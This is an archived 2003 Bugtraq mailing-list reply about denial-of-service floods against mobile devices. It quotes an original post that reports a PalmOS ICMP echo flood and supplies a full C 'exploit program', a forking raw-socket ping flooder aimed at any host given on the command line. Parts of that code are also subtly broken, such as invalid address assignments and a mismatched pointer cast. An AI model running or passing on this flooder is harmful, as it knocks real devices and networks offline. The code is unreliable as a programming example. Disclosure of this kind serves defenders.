RE: PalmOS ICMP flood DoS.

["Jay D. Thomson" <jdthomson () mobile-secure com>]

Shaun,

PalmOS isn't the only mobile device operating system that is vulnerable
to flooding attacks like this.  Caleb Sima of SPI Dynamics has
discovered a highly effective SMS flood that will render most PocketPC
and Symbian based devices, as well as almost every modern cellphone
unusable.  In addition, based on Caleb's work, MobileSecure Labs has
determined that there are a number of similar attacks that will produce
the same result.  The bottom line: don't rely on these kinds of
operating systems as being secure on their own -- they aren't.

______________
Jay D. Thomson
MobileSecure, Inc.
"Information security for a mobile world"
http://www.mobile-secure.com/



-----Original Message-----
Date: Wed, 14 May 2003 17:14:14 +0100 (BST)
From: "[iso-8859-1] Shaun Moore" <shaunige () yahoo co uk>
To: bugtraq () securityfocus com
Subject: PalmOS ICMP flood DoS.

-[BACKGROUND]-:

PalmOS is vulnerable to an ICMP DoS attack, when an
attacker continuously sends ICMP_ECHO packets to the
device.  This attack causes 100% CPU usage, and the
device therefore comes to a total lockup.  The Pilot
is almost instantly rendered unusable, until the
attacker stops sending packets, or the device is
reset.  The DoS attack often forces PalmOS to lose
it's network connections (Internet and LAN connects
etc...), due to the exhaustion of sending replies to
the continuous hoard of ICMP_ECHO packets it is
receiving.
Although unconfirmed (haven't seen it happen yet),
this attack may even cause the device to display the
message "Fatal exception", and require resetting
immediately.
Although the vulnerability does not cause any data to
be lost (unless the Palm is DoSed when a user is doing
some work), this could still be extremely annoying to
the Palm user trying to check his e-mail or writing a
document.  If the user is writing a document or doing
some other form of work, and the attacker is
persistant (won't stop until the device is offline),
it would almost certainly mean loss of data since the
user last save the document, because the user would
probably end up resetting.


-[EXPLOIT]-:

To exploit the vulnerability, you would need to
continuous send ICMP_ECHO packets, without waiting for
a reply, by using one than more process for optional
added effect (by using fork()'s).
I wrote the following exploit program to exploit the
vulnerability in PalmOS:

------------------CUT HERE-------------------
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
int main(int argc, char *argv[]) {
        if(argc < 2) {
                printf("Usage: %s <host>\n", argv[0]);
                exit(0);
        }

        int sock;
        char packet[2000];
        struct sockaddr_in dest;
        struct hostent *host;
        struct iphdr *ip = (struct iphdr *) packet;
        struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
        if((host = gethostbyname(argv[1])) == NULL) {
                printf("Couldn't resolve host!\n");
                exit(-1);
        }

        if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
                printf("Couldn't make socket!\n");
                printf("You must be root to create a
raw socket.\n");
                exit(-1);
        }

        dest.sin_family = AF_INET;
        dest.sin_addr = *((struct in_addr
*)host->h_addr);
        ip->ihl = 5;
        ip->id = htons(1337);
        ip->ttl = 255;
        ip->tos = 0;
        ip->protocol = IPPROTO_ICMP;
        ip->version = 4;
        ip->frag_off = 0;
        ip->saddr = htons("127.0");
        ip->daddr = inet_ntoa(dest.sin_addr);
        ip->tot_len = sizeof(struct iphdr) +
sizeof(struct icmphdr);
        ip->check = 0;
        icmp->checksum = 0;
        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        printf("Ping flooding %s!\n", argv[1]);
        fork();
        fork();
        while(1) {
                sendto(sock, packet, ip->tot_len, 0,
(struct sockaddr *)&dest, sizeof(struct sockaddr));
        }
        return(0);
}
------------------CUT HERE-------------------


Thank you for your time.
Shaun.

__________________________________________________
Yahoo! Plus
For a better Internet experience
http://www.yahoo.co.uk/btoffer